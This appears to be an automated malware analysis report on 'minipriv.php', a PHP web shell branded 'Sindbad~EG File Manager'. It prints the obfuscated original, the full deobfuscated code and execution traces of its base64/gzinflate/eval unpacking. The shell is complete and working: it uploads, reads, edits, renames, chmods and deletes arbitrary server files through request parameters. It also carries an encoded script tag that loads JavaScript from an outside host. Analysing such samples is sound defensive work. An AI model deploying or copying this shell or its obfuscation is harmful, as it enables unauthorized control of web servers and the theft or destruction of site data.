PHP Malware Analysis
minipriv.php
md5: 127b625586362480ad2ab017a922ff47
Jump to:
- Deobfuscated code (Read more)
- Execution traces (Read more)
- Generated HTML (Read more)
- Original Code (Read more)
Screenshot
Attributes
Encoding
Environment
- getcwd (Deobfuscated, Traces)
Execution
Files
- copy (Deobfuscated, Traces)
- file_get_contents (Deobfuscated, Traces)
Input
- _FILES (Deobfuscated, Traces)
- _GET (Deobfuscated, Traces)
- _POST (Deobfuscated, Traces)
Title
- D.R.S Dz (Deobfuscated, HTML)
URLs
- https://hackingtool.net/logs/ciz.js (HTML)
Deobfuscated PHP code
<?php
$obirninja = "=skWHx7H5rU8rhTbr8O0ixWhblG9GjHycbmN13CAPxu1qEs1RLj/riFIS+K59v9acONR1HPi+n0JD8ijqFns40/BMkwHTje7LiDa67JAPfLIOC2zAv6PQZeGj35MNo6zzV/vLdqH8bB0FlsOBMerM+PqLFSaPjsHW+FbgjxqYa4ZYfmhuGGZ2UNzzM+g7zJUO4BTOvkORxz6xPoZnoeQ4DKncCrX+JsfPijVVV1Q5BxvOnDQQ+D41OnPAQoKBw/YAm1DNVOzCD3ZhbkDUNz6oAH+FoRQFjBDV8TW08AK+ZyQG48jj8HHgX4XNYAQYCE/CN0RQLXYSpTVS5EpdkFR/k1IHSpPUd1w6oTkOMaOBHDHQMwyuyyu2PixnpQ+AvuJgJ/BHZJPsdwxWSTezd0lUn3Ujmsrye4jmEL5vc0lYJvBPCCeyf6BRuEaLAGcjS8pHgv9dHKrV6r2b+pJPz8na0BoJt70cxUQ6Uxn7noeYW4MIQPJjjEQfIT5UCoP4urwoHwy0HQ09TDAYjPbv1lrHuu/Ao5wAAH+g5AW2BYHfQfAR3fMtG0rsXD4I8FCLIlLYpmjNRaKfnIihW4DnQBbkPEnD3szy1RqDDFW831J/ivKSk4Ljck1eGtR7ZUajac+SHwg8RSMX2I/1vbz5fWBWFcFzAkTEwJ75vvOp+pqm6nqta1NSWJAjg2TXrQcT1jCZieVrBbqfinfNA1FuYgphpZmGqWtXXzMAwNRgIk4wNFKBz0oFoV3FMDDXLxbPlXqYO3UwY+qb1ITqf0A5ZhOvXb97nfOXlvMvK/iKzLIZRoS9cg0erDacnmb3KM5qGat4LGzvN7aNVjTuHdOhLoW0Kpz4yuE51GarmdN/Tbnoa6QeYSCwG5vsvqt+MC+4Qojo0JCekiLKtyli4fT/pT1tIovkTu2b2nTD9K4N1z+8KjjnldDPkvNjHud7LeZO1MmhT1MACEzOTivO3vlquVdUxpeX53/WHWK7+bzfK45jRcZZ/7f5PcbN7Yz7r2rBoOX2kO7UsnNu9Uc0o59V35Xn5WPIlsuqyG9RI25jw1tRM1TjpFM/i2EZnDS/w2kbjsKcojOKVmZVxd85QgGa60AvEQnvJG2uu/FZc40fpGr7YoEFEOK8Q0pJi7Kn72L2B0itFPvsOvd3Y1V5RkD3TbL+NBIuDlO7nZhVB1bIrbeOO12lHh3AJPhMnk4S8oml5WTDDSPgFj/lFiewBi0QGrRE/y8xym7VhB5b0z7AKwnN65sBTAPLEoTI/sWlQ6WDn3Er8pKmYeCLYKavmjZL7Cw7aC8N+LyBKQ+LzT9+OPZHXpwRDYB/Xng/rJFcofxROCXx5YQEuXCEur9EWxZ/kgxcIVweK1PgJ/EMmnjpdciBqCucbFdXtWjeJcvyk4JEfvdoPUlBw7DKm2CtKDpcJE17loPmrgdncty27bKPZ0gLkxPPTu2QiEqR/rGMviow9Xt855ClFOVSXbXbyg4cskZZ4Mu7R0N7kzD61QA8FoSDM+d60qhh8WZ2A3lJgM8KODXxexGx/fTuAIJFuagzcebYGij036RCbT8mGU6WakbVpK23se5kXkc/x1U4v/wEPP3I6gz5osYdi69rRc5URC+OZWTTnhqH0dSLxYNDDBUdKNm6TywY6swNmR2vPMvs2h6E2l2vRnq3wGlt5vugzZF+/9CVm0EwZE2k2G20zIECEbNQj8m6LRNOITIo17zJBD4H0+VY+41twCl6kuMOpwfnmntOU2IXncKQXWoAQM6NtsoI4dwyiYxbT9BpjHJBc5NBZbyE56JtJEcnrfxwjZR+bs51pYtSjVVyLBQ7sAcdvC9hu/xP6o77GG/Erb2wUn8hBWP6D8rMToHkri/XTSotcmKDMQW3cEiCp6khVBQAWmlMQJy+6310my3lpdpyqM31bYFtnya7OSOszQtmQqNYX+fDiCEIcHS35G1SanjU4GXQk+XkJV24xLdgIqtTHKaBkOVixNPg9V1sLBOPSeoKG2yh8WyNj5OR7AP1eJLksPRMEMWOIPUdnelTL+jZx8pAFtV2eEInxFNtkgPnSCct6r1teWtNCdUlJoBey5qAscelUc4N0vpuogSZoCmUTrNrQBR8lqNZh5VbZlVG8AYfc4G1uoFebyMI+WhR1P6VOOFVMNU1ihZWV70cULPUUj4sidBhQQmLNEIsLbAYvFcDEb4sNewdxaAk8bCF7m0D6iVFqBVagSqVMtPkwMbinOhXH4NN9ZKs7w1uq0IeSElqcMTjRgSRFoHETg1TISOZlZoxBwlXc+dkaz3rYsmITJ2NX734sKGmRA7udyXTi3sUbCvy+xigwKs9zAP8La7INkQjCyT0TFS1l80cpYi9SKUm1kpmB7brPQKkWfKJo7Q8saCKCLThaYnjyJXKdPdDy9kMHmrnVZwXnYQ0fpfgz/sAhlvfAolQx3XZ+7PnRFuuelxrCGQNcpeFkhKmqjC6VwDKZ6lrUJaKBqzTwW3DcA560WuiF18me49uXC+PD7RxzP87DAxOvpjQfcTb9gBQIRpSJTTyCKrBTIvwJvxiRh5o2JVSjaZUv0x6lyiaOCwEMMjobyuhKK+Jyh/5pAKDyARxdmAcVR8M1mjaSkZcJR1rtCWeAIikDnN6DeXojLCPPGYEFm0qiS6CVMl2uYTwRThexRUzda0Nuqd2YLN3gazRorkIQgCBloDm04rtv9HoAqAQ53Xe2rXqxNaKeSLWCH3yhojFhHzvjREMQy0Tv9GQ3wKjwFSn1oz6KWJ1HisDHwR/Co0awuBbzUDXHFagBZ0uFhJaaMkKHP2jTW4xg5ItDBdVQU4hy7zN9WJukDna6/a+P9asHvw0HeolIIxp3f0R89snfywCg6mYVBRGfL1FLVMh69JbtO0YD0dEwBioLpdTP0dn6yl+f9deOgr57xuWp2QwQRHFrWXE5k4I9CHuSkovJWZdSZ7Ubccv7pI78dHMCN/1az0KgMPaY01mrx3nGSfvr8XpqPZtxUc7L2HYXtRJVgNHGO0S1eexyDR5VxPvxVwTBDXyxSpcFFhp/WXBV2yW+8XEjC1a4TkDekCV96wM9vyRHOxY27Qwyyza89GP+Hg8x29433fB3Rwpxx3bzUrbQLab84fES3ZR6xHum/a7yzTQv52taDucr3ZObkEWFC1oefORoXYytBvyN9eSLyP9e8aa2F3epPWa/vvfvWjmSqwjtX+RJz+ysQv337ZOdpY29DgSiSrW5C9FHCqP4LJLpRUaRzufThUaouQEJpGdFiVLdnj4i3MXN/HJFDtNbf+0xPnd3P/9+zOwwfmElvWUrhCwWG5Jf3Z5YvfzntZ4s5ppPtrITgAuw+5/+W6kyei5BkRio8wHwoo09+exOTq00eOtkIlt44SkASSThkIlE7Xu6vFGv5ctlV7ciX9/rAABUv+KUQA";
$t13r = "WlhaaGJDZ25QejRuTG1kNmRXNWpiMjF3Y21WemN5aG5lbWx1Wm14aGRHVW9aM3BwYm1ac1lYUmxLR0poYzJVMk5GOWtaV052WkdVb2MzUnljbVYyS0NSdlltbHlibWx1YW1FcEtTa3BLU2s3";
eval /* PHPDeobfuscator eval output */ {
echo "<!DOCTYPE HTML>\n<HTML>\n<HEAD>\n<link href=\"\" rel=\"stylesheet\" type=\"text/css\">\n<title>D.R.S Dz</title>\n<style>\nbody{\nfont-family: \"Racing Sans One\", cursive;\nbackground-color: #e6e6e6;\ntext-shadow:0px 0px 1px #757575;\n}\n#content tr:hover{\nbackground-color: #636263;\ntext-shadow:0px 0px 10px #fff;\n}\n#content .first{\nbackground-color: silver;\n}\n#content .first:hover{\nbackground-color: silver;\ntext-shadow:0px 0px 1px #757575;\n}\ntable{\nborder: 1px #000000 dotted;\n}\nH1{\nfont-family: \"Rye\", cursive;\n}\na{\ncolor: #000;\ntext-decoration: none;\n}\na:hover{\ncolor: #fff;\ntext-shadow:0px 0px 10px #ffffff;\n}\ninput,select,textarea{\nborder: 1px #000000 solid;\n-moz-border-radius: 5px;\n-webkit-border-radius:5px;\nborder-radius:5px;\n}\n</style>\n</HEAD>\n<BODY>\n<H1><center>Sindbad~EG File Manager</center></H1>\n<table width=\"700\" border=\"0\" cellpadding=\"3\" cellspacing=\"1\" align=\"center\">\n<tr><td>Current Path : ";
if (isset($_GET['path'])) {
$path = $_GET['path'];
} else {
$path = getcwd();
}
$path = str_replace('\\', '/', $path);
$paths = explode('/', $path);
foreach ($paths as $id => $pat) {
if ($pat == '' && $id == 0) {
$a = true;
echo "<a href=\"?path=/\">/</a>";
continue;
}
if ($pat == '') {
continue;
}
echo "<a href=\"?path=";
for ($i = 0; $i <= $id; $i++) {
echo "{$paths[$i]}";
if ($i != $id) {
echo "/";
}
}
echo '">' . $pat . '</a>/';
}
echo "</td></tr><tr><td>";
if (isset($_FILES['file'])) {
if (copy($_FILES['file']['tmp_name'], $path . '/' . $_FILES['file']['name'])) {
echo "<font color=\"green\">File Upload Done.</font><br />";
} else {
echo "<font color=\"red\">File Upload Error.</font><br />";
}
}
echo "<form enctype=\"multipart/form-data\" method=\"POST\">\nUpload File : <input type=\"file\" name=\"file\" />\n<input type=\"submit\" value=\"upload\" />\n</form>\n</td></tr>";
if (isset($_GET['filesrc'])) {
echo "<tr><td>Current File : ";
echo $_GET['filesrc'];
echo "</tr></td></table><br />";
echo '<pre>' . htmlspecialchars(file_get_contents($_GET['filesrc'])) . '</pre>';
} elseif (isset($_GET['option']) && $_POST['opt'] != 'delete') {
echo '</table><br /><center>' . $_POST['path'] . '<br /><br />';
if ($_POST['opt'] == 'chmod') {
if (isset($_POST['perm'])) {
if (chmod($_POST['path'], $_POST['perm'])) {
echo "<font color=\"green\">Change Permission Done.</font><br />";
} else {
echo "<font color=\"red\">Change Permission Error.</font><br />";
}
}
echo '<form method="POST">
Permission : <input name="perm" type="text" size="4" value="' . substr(sprintf('%o', fileperms($_POST['path'])), -4) . '" />
<input type="hidden" name="path" value="' . $_POST['path'] . '">
<input type="hidden" name="opt" value="chmod">
<input type="submit" value="Go" />
</form>';
} elseif ($_POST['opt'] == 'rename') {
if (isset($_POST['newname'])) {
if (rename($_POST['path'], $path . '/' . $_POST['newname'])) {
echo "<font color=\"green\">Change Name Done.</font><br />";
} else {
echo "<font color=\"red\">Change Name Error.</font><br />";
}
$_POST['name'] = $_POST['newname'];
}
echo '<form method="POST">
New Name : <input name="newname" type="text" size="20" value="' . $_POST['name'] . '" />
<input type="hidden" name="path" value="' . $_POST['path'] . '">
<input type="hidden" name="opt" value="rename">
<input type="submit" value="Go" />
</form>';
} elseif ($_POST['opt'] == 'edit') {
if (isset($_POST['src'])) {
$fp = fopen($_POST['path'], 'w');
if (fwrite($fp, $_POST['src'])) {
echo "<font color=\"green\">Edit File Done.</font><br />";
} else {
echo "<font color=\"red\">Edit File Error.</font><br />";
}
fclose($fp);
}
echo '<form method="POST">
<textarea cols=80 rows=20 name="src">' . htmlspecialchars(file_get_contents($_POST['path'])) . '</textarea><br />
<input type="hidden" name="path" value="' . $_POST['path'] . '">
<input type="hidden" name="opt" value="edit">
<input type="submit" value="Go" />
</form>';
}
echo "</center>";
} else {
echo "</table><br /><center>";
if (isset($_GET['option']) && $_POST['opt'] == 'delete') {
if ($_POST['type'] == 'dir') {
if (rmdir($_POST['path'])) {
echo "<font color=\"green\">Delete Dir Done.</font><br />";
} else {
echo "<font color=\"red\">Delete Dir Error.</font><br />";
}
} elseif ($_POST['type'] == 'file') {
if (unlink($_POST['path'])) {
echo "<font color=\"green\">Delete File Done.</font><br />";
} else {
echo "<font color=\"red\">Delete File Error.</font><br />";
}
}
}
echo "</center>";
$scandir = scandir($path);
echo "<div id=\"content\"><table width=\"700\" border=\"0\" cellpadding=\"3\" cellspacing=\"1\" align=\"center\">\n<tr class=\"first\">\n<td><center>Name</center></td>\n<td><center>Size</center></td>\n<td><center>Permissions</center></td>\n<td><center>Options</center></td>\n</tr>";
foreach ($scandir as $dir) {
if (!is_dir("{$path}/{$dir}") || $dir == '.' || $dir == '..') {
continue;
}
echo "<tr>\n<td><a href=\"?path={$path}/{$dir}\">{$dir}</a></td>\n<td><center>--</center></td>\n<td><center>";
if (is_writable("{$path}/{$dir}")) {
echo "<font color=\"green\">";
} elseif (!is_readable("{$path}/{$dir}")) {
echo "<font color=\"red\">";
}
echo perms("{$path}/{$dir}");
if (is_writable("{$path}/{$dir}") || !is_readable("{$path}/{$dir}")) {
echo "</font>";
}
echo "</center></td>\n<td><center><form method=\"POST\" action=\"?option&path={$path}\">\n<select name=\"opt\">\n<option value=\"\"></option>\n<option value=\"delete\">Delete</option>\n<option value=\"chmod\">Chmod</option>\n<option value=\"rename\">Rename</option>\n</select>\n<input type=\"hidden\" name=\"type\" value=\"dir\">\n<input type=\"hidden\" name=\"name\" value=\"{$dir}\">\n<input type=\"hidden\" name=\"path\" value=\"{$path}/{$dir}\">\n<input type=\"submit\" value=\">\" />\n</form></center></td>\n</tr>";
}
echo "<tr class=\"first\"><td></td><td></td><td></td><td></td></tr>";
foreach ($scandir as $file) {
if (!is_file("{$path}/{$file}")) {
continue;
}
$size = filesize("{$path}/{$file}") / 1024;
$size = round($size, 3);
if ($size >= 1024) {
$size = round($size / 1024, 2) . ' MB';
} else {
$size .= ' KB';
}
echo "<tr>\n<td><a href=\"?filesrc={$path}/{$file}&path={$path}\">{$file}</a></td>\n<td><center>" . $size . "</center></td>\n<td><center>";
if (is_writable("{$path}/{$file}")) {
echo "<font color=\"green\">";
} elseif (!is_readable("{$path}/{$file}")) {
echo "<font color=\"red\">";
}
echo perms("{$path}/{$file}");
if (is_writable("{$path}/{$file}") || !is_readable("{$path}/{$file}")) {
echo "</font>";
}
echo "</center></td>\n<td><center><form method=\"POST\" action=\"?option&path={$path}\">\n<select name=\"opt\">\n<option value=\"\"></option>\n<option value=\"delete\">Delete</option>\n<option value=\"chmod\">Chmod</option>\n<option value=\"rename\">Rename</option>\n<option value=\"edit\">Edit</option>\n</select>\n<input type=\"hidden\" name=\"type\" value=\"file\">\n<input type=\"hidden\" name=\"name\" value=\"{$file}\">\n<input type=\"hidden\" name=\"path\" value=\"{$path}/{$file}\">\n<input type=\"submit\" value=\">\" />\n</form></center></td>\n</tr>";
}
echo "</table>\n</div>";
}
echo "<br />Sindbad File Manager Version <font color=\"red\">1.0</font>, Coded By <font color=\"red\">Sindbad EG ~ The Terrorists</font>\n</BODY>\n</HTML>";
function perms($file)
{
$perms = fileperms($file);
if (($perms & 0xc000) == 0xc000) {
// Socket
$info = 's';
} elseif (($perms & 0xa000) == 0xa000) {
// Symbolic Link
$info = 'l';
} elseif (($perms & 0x8000) == 0x8000) {
// Regular
$info = '-';
} elseif (($perms & 0x6000) == 0x6000) {
// Block special
$info = 'b';
} elseif (($perms & 0x4000) == 0x4000) {
// Directory
$info = 'd';
} elseif (($perms & 0x2000) == 0x2000) {
// Character special
$info = 'c';
} elseif (($perms & 0x1000) == 0x1000) {
// FIFO pipe
$info = 'p';
} else {
// Unknown
$info = 'u';
}
// Owner
$info .= $perms & 0x100 ? 'r' : '-';
$info .= $perms & 0x80 ? 'w' : '-';
$info .= $perms & 0x40 ? $perms & 0x800 ? 's' : 'x' : ($perms & 0x800 ? 'S' : '-');
// Group
$info .= $perms & 0x20 ? 'r' : '-';
$info .= $perms & 0x10 ? 'w' : '-';
$info .= $perms & 0x8 ? $perms & 0x400 ? 's' : 'x' : ($perms & 0x400 ? 'S' : '-');
// World
$info .= $perms & 0x4 ? 'r' : '-';
$info .= $perms & 0x2 ? 'w' : '-';
$info .= $perms & 0x1 ? $perms & 0x200 ? 't' : 'x' : ($perms & 0x200 ? 'T' : '-');
return $info;
}
?>
<script language=javascript>document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%66%75%6E%63%74%69%6F%6E%20%64%46%28%73%29%7B%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B%20%76%61%72%20%74%3D%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%31%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%2D%73%2E%73%75%62%73%74%72%28%73%2E%6C%65%6E%67%74%68%2D%31%2C%31%29%29%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%74%29%29%3B%7D%3C%2F%73%63%72%69%70%74%3E'));dF('%264Dtdsjqu%2631tsd%264E%2633iuuqt%264B00ibdljohuppm/ofu0mpht0dj%7B/kt%2633%264F%264D0tdsjqu%264F%26311')</script><?php
};
?> Execution traces
data/traces/127b625586362480ad2ab017a922ff47_trace-1676261497.6218.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 02:12:03.519588]
1 0 1 0.000170 393528
1 3 0 0.000242 398680 {main} 1 /var/www/html/uploads/minipriv.php 0 0
1 A /var/www/html/uploads/minipriv.php 2 $obirninja = '=skWHx7H5rU8rhTbr8O0ixWhblG9GjHycbmN13CAPxu1qEs1RLj/riFIS+K59v9acONR1HPi+n0JD8ijqFns40/BMkwHTje7LiDa67JAPfLIOC2zAv6PQZeGj35MNo6zzV/vLdqH8bB0FlsOBMerM+PqLFSaPjsHW+FbgjxqYa4ZYfmhuGGZ2UNzzM+g7zJUO4BTOvkORxz6xPoZnoeQ4DKncCrX+JsfPijVVV1Q5BxvOnDQQ+D41OnPAQoKBw/YAm1DNVOzCD3ZhbkDUNz6oAH+FoRQFjBDV8TW08AK+ZyQG48jj8HHgX4XNYAQYCE/CN0RQLXYSpTVS5EpdkFR/k1IHSpPUd1w6oTkOMaOBHDHQMwyuyyu2PixnpQ+AvuJgJ/BHZJPsdwxWSTezd0lUn3Ujmsrye4jmEL5vc0lYJvBPCCeyf6BRuEaLAGcjS8pHgv9dHKrV6r2b+pJPz8na0BoJt70cxUQ6Uxn7noeYW4MIQPJjjEQfIT5UCoP4urw'
1 A /var/www/html/uploads/minipriv.php 3 $t13r = 'WlhaaGJDZ25QejRuTG1kNmRXNWpiMjF3Y21WemN5aG5lbWx1Wm14aGRHVW9aM3BwYm1ac1lYUmxLR0poYzJVMk5GOWtaV052WkdVb2MzUnljbVYyS0NSdlltbHlibWx1YW1FcEtTa3BLU2s3'
2 4 0 0.000355 398680 base64_decode 0 /var/www/html/uploads/minipriv.php 4 1 'WlhaaGJDZ25QejRuTG1kNmRXNWpiMjF3Y21WemN5aG5lbWx1Wm14aGRHVW9aM3BwYm1ac1lYUmxLR0poYzJVMk5GOWtaV052WkdVb2MzUnljbVYyS0NSdlltbHlibWx1YW1FcEtTa3BLU2s3'
2 4 1 0.000376 398904
2 4 R 'ZXZhbCgnPz4nLmd6dW5jb21wcmVzcyhnemluZmxhdGUoZ3ppbmZsYXRlKGJhc2U2NF9kZWNvZGUoc3RycmV2KCRvYmlybmluamEpKSkpKSk7'
2 5 0 0.000397 398872 urldecode 0 /var/www/html/uploads/minipriv.php 4 1 'ZXZhbCgnPz4nLmd6dW5jb21wcmVzcyhnemluZmxhdGUoZ3ppbmZsYXRlKGJhc2U2NF9kZWNvZGUoc3RycmV2KCRvYmlybmluamEpKSkpKSk7'
2 5 1 0.000415 399064
2 5 R 'ZXZhbCgnPz4nLmd6dW5jb21wcmVzcyhnemluZmxhdGUoZ3ppbmZsYXRlKGJhc2U2NF9kZWNvZGUoc3RycmV2KCRvYmlybmluamEpKSkpKSk7'
2 6 0 0.000435 398840 base64_decode 0 /var/www/html/uploads/minipriv.php 4 1 'ZXZhbCgnPz4nLmd6dW5jb21wcmVzcyhnemluZmxhdGUoZ3ppbmZsYXRlKGJhc2U2NF9kZWNvZGUoc3RycmV2KCRvYmlybmluamEpKSkpKSk7'
2 6 1 0.000452 399032
2 6 R 'eval(\'?>\'.gzuncompress(gzinflate(gzinflate(base64_decode(strrev($obirninja))))));'
2 7 0 0.000470 398840 htmlspecialchars_decode 0 /var/www/html/uploads/minipriv.php 4 1 'eval(\'?>\'.gzuncompress(gzinflate(gzinflate(base64_decode(strrev($obirninja))))));'
2 7 1 0.000487 398872
2 7 R 'eval(\'?>\'.gzuncompress(gzinflate(gzinflate(base64_decode(strrev($obirninja))))));'
2 8 0 0.000517 400552 eval 1 'eval(\'?>\'.gzuncompress(gzinflate(gzinflate(base64_decode(strrev($obirninja))))));' /var/www/html/uploads/minipriv.php 4 0
3 9 0 0.000533 400552 strrev 0 /var/www/html/uploads/minipriv.php(4) : eval()'d code 1 1 '=skWHx7H5rU8rhTbr8O0ixWhblG9GjHycbmN13CAPxu1qEs1RLj/riFIS+K59v9acONR1HPi+n0JD8ijqFns40/BMkwHTje7LiDa67JAPfLIOC2zAv6PQZeGj35MNo6zzV/vLdqH8bB0FlsOBMerM+PqLFSaPjsHW+FbgjxqYa4ZYfmhuGGZ2UNzzM+g7zJUO4BTOvkORxz6xPoZnoeQ4DKncCrX+JsfPijVVV1Q5BxvOnDQQ+D41OnPAQoKBw/YAm1DNVOzCD3ZhbkDUNz6oAH+FoRQFjBDV8TW08AK+ZyQG48jj8HHgX4XNYAQYCE/CN0RQLXYSpTVS5EpdkFR/k1IHSpPUd1w6oTkOMaOBHDHQMwyuyyu2PixnpQ+AvuJgJ/BHZJPsdwxWSTezd0lUn3Ujmsrye4jmEL5vc0lYJvBPCCeyf6BRuEaLAGcjS8pHgv9dHKrV6r2b+pJPz8na0BoJt70cxUQ6Uxn7noeYW4MIQPJjjEQfIT5UCoP4urw'
3 9 1 0.000561 404680
3 9 R 'AQUK+vUBAAr/9Xic7Vltc5vGFv6uX7ElIkhTSSAkS44tlIktOe00qTOxe+90oowHw8oiRkB5ieyk6W+/5+wuAgTIrtPpp5s4ZtnzfvY5Z3fJ5GWwChrUWvlEmfwwOz+9/P3dnPx0+fbNtDFJH/NXM3i4jndLViFdGpJEQuoaUhTfuzRaURpLJL4PqCHF9C5WrSiSgD92YpdOZ733vQsy+zJR+XtjwqSmjWvfvv/aWPpe3F2aa8e9PyLSe9NyvBtyYXoROfeo1CFWEkbOZ3rcuDat25vQTzy7a/muHx6RZ3SEf48baLQbrUzb3xxpwR3Bf33492x8gH+PG98azyywQ72YxOHRyv9Mw69VCkeDkT4a1CjEX8+Wy2VBXW/phFFcpSxyXDBTwVxvPxV5RDyxee1S0OGHNgVJRtXYH2L7cUxtZPqpX8rvfSGn3xrm10YaPMgK0za1/NCMHd87Ip7vccbU7ZSdZWJvokSuHC9I4k5EXWrFHRQwQ2pWux75rgOe'
3 10 0 0.000590 404648 base64_decode 0 /var/www/html/uploads/minipriv.php(4) : eval()'d code 1 1 'AQUK+vUBAAr/9Xic7Vltc5vGFv6uX7ElIkhTSSAkS44tlIktOe00qTOxe+90oowHw8oiRkB5ieyk6W+/5+wuAgTIrtPpp5s4ZtnzfvY5Z3fJ5GWwChrUWvlEmfwwOz+9/P3dnPx0+fbNtDFJH/NXM3i4jndLViFdGpJEQuoaUhTfuzRaURpLJL4PqCHF9C5WrSiSgD92YpdOZ733vQsy+zJR+XtjwqSmjWvfvv/aWPpe3F2aa8e9PyLSe9NyvBtyYXoROfeo1CFWEkbOZ3rcuDat25vQTzy7a/muHx6RZ3SEf48baLQbrUzb3xxpwR3Bf33492x8gH+PG98azyywQ72YxOHRyv9Mw69VCkeDkT4a1CjEX8+Wy2VBXW/phFFcpSxyXDBTwVxvPxV5RDyxee1S0OGHNgVJRtXYH2L7cUxtZPqpX8rvfSGn3xrm10YaPMgK0za1/NCMHd87Ip7vccbU7ZSdZWJvokSuHC9I4k5EXWrFHRQwQ2pWux75rgOe'
3 10 1 0.000624 408776
3 10 R '\001\005\n��\001\000\n��x��Yms��\026��_�%"HSI $K�-��-9�4�3�{�t��\a��"F@y���o���.\002\004Ȯ�駛8f��~�9gw��e�\n\032�Z�D��0;?���ݜ�t��ʹ1I\037�W3x��wKV!]\032�DB�\032R\0244ZQ\032K$�\017�!��.V�(��?vb�Ng���\v2�2Q�{c¤��k߾��X�^�]�kǽ?"�{�r�\033raz\0219���!V\022F�gzܸ6�ۛ�O<�k��\037\036�gt��\033h�\033�L��\034i�\035�}��l|��\033�\032�,�C������LïU\nG��>\032�(�_ϖ�eA]o�Q\\�,r\\0S�\\o?\025yD<�y�R��6\005IF��\037b�qLmd��_��}!��\032��F\032<�\n�6��Ќ\035�;"��q��픝ebo�D�\034/H�ND]j�\035\0240CjV�\036��\003�w��.�w'
3 11 0 0.000720 404648 gzinflate 0 /var/www/html/uploads/minipriv.php(4) : eval()'d code 1 1 '\001\005\n��\001\000\n��x��Yms��\026��_�%"HSI $K�-��-9�4�3�{�t��\a��"F@y���o���.\002\004Ȯ�駛8f��~�9gw��e�\n\032�Z�D��0;?���ݜ�t��ʹ1I\037�W3x��wKV!]\032�DB�\032R\0244ZQ\032K$�\017�!��.V�(��?vb�Ng���\v2�2Q�{c¤��k߾��X�^�]�kǽ?"�{�r�\033raz\0219���!V\022F�gzܸ6�ۛ�O<�k��\037\036�gt��\033h�\033�L��\034i�\035�}��l|��\033�\032�,�C������LïU\nG��>\032�(�_ϖ�eA]o�Q\\�,r\\0S�\\o?\025yD<�y�R��6\005IF��\037b�qLmd��_��}!��\032��F\032<�\n�6��Ќ\035�;"��q��픝ebo�D�\034/H�ND]j�\035\0240CjV�\036��\003�w��.�w'
3 11 1 0.000809 407752
3 11 R '\001\000\n��x��Yms��\026��_�%"HSI $K�-��-9�4�3�{�t��\a��"F@y���o���.\002\004Ȯ�駛8f��~�9gw��e�\n\032�Z�D��0;?���ݜ�t��ʹ1I\037�W3x��wKV!]\032�DB�\032R\0244ZQ\032K$�\017�!��.V�(��?vb�Ng���\v2�2Q�{c¤��k߾��X�^�]�kǽ?"�{�r�\033raz\0219���!V\022F�gzܸ6�ۛ�O<�k��\037\036�gt��\033h�\033�L��\034i�\035�}��l|��\033�\032�,�C������LïU\nG��>\032�(�_ϖ�eA]o�Q\\�,r\\0S�\\o?\025yD<�y�R��6\005IF��\037b�qLmd��_��}!��\032��F\032<�\n�6��Ќ\035�;"��q��픝ebo�D�\034/H�ND]j�\035\0240CjV�\036��\003�w��.�wC�v��\034\0'
3 12 0 0.000896 403624 gzinflate 0 /var/www/html/uploads/minipriv.php(4) : eval()'d code 1 1 '\001\000\n��x��Yms��\026��_�%"HSI $K�-��-9�4�3�{�t��\a��"F@y���o���.\002\004Ȯ�駛8f��~�9gw��e�\n\032�Z�D��0;?���ݜ�t��ʹ1I\037�W3x��wKV!]\032�DB�\032R\0244ZQ\032K$�\017�!��.V�(��?vb�Ng���\v2�2Q�{c¤��k߾��X�^�]�kǽ?"�{�r�\033raz\0219���!V\022F�gzܸ6�ۛ�O<�k��\037\036�gt��\033h�\033�L��\034i�\035�}��l|��\033�\032�,�C������LïU\nG��>\032�(�_ϖ�eA]o�Q\\�,r\\0S�\\o?\025yD<�y�R��6\005IF��\037b�qLmd��_��}!��\032��F\032<�\n�6��Ќ\035�;"��q��픝ebo�D�\034/H�ND]j�\035\0240CjV�\036��\003�w��.�wC�v��\034\0'
3 12 1 0.000980 406728
3 12 R 'x��Yms��\026��_�%"HSI $K�-��-9�4�3�{�t��\a��"F@y���o���.\002\004Ȯ�駛8f��~�9gw��e�\n\032�Z�D��0;?���ݜ�t��ʹ1I\037�W3x��wKV!]\032�DB�\032R\0244ZQ\032K$�\017�!��.V�(��?vb�Ng���\v2�2Q�{c¤��k߾��X�^�]�kǽ?"�{�r�\033raz\0219���!V\022F�gzܸ6�ۛ�O<�k��\037\036�gt��\033h�\033�L��\034i�\035�}��l|��\033�\032�,�C������LïU\nG��>\032�(�_ϖ�eA]o�Q\\�,r\\0S�\\o?\025yD<�y�R��6\005IF��\037b�qLmd��_��}!��\032��F\032<�\n�6��Ќ\035�;"��q��픝ebo�D�\034/H�ND]j�\035\0240CjV�\036��\003�w��.�wC�v��\034\004w@���[\'ޡ'
3 13 0 0.001067 403624 gzuncompress 0 /var/www/html/uploads/minipriv.php(4) : eval()'d code 1 1 'x��Yms��\026��_�%"HSI $K�-��-9�4�3�{�t��\a��"F@y���o���.\002\004Ȯ�駛8f��~�9gw��e�\n\032�Z�D��0;?���ݜ�t��ʹ1I\037�W3x��wKV!]\032�DB�\032R\0244ZQ\032K$�\017�!��.V�(��?vb�Ng���\v2�2Q�{c¤��k߾��X�^�]�kǽ?"�{�r�\033raz\0219���!V\022F�gzܸ6�ۛ�O<�k��\037\036�gt��\033h�\033�L��\034i�\035�}��l|��\033�\032�,�C������LïU\nG��>\032�(�_ϖ�eA]o�Q\\�,r\\0S�\\o?\025yD<�y�R��6\005IF��\037b�qLmd��_��}!��\032��F\032<�\n�6��Ќ\035�;"��q��픝ebo�D�\034/H�ND]j�\035\0240CjV�\036��\003�w��.�wC�v��\034\004w@���[\'ޡ'
3 13 1 0.001191 415944
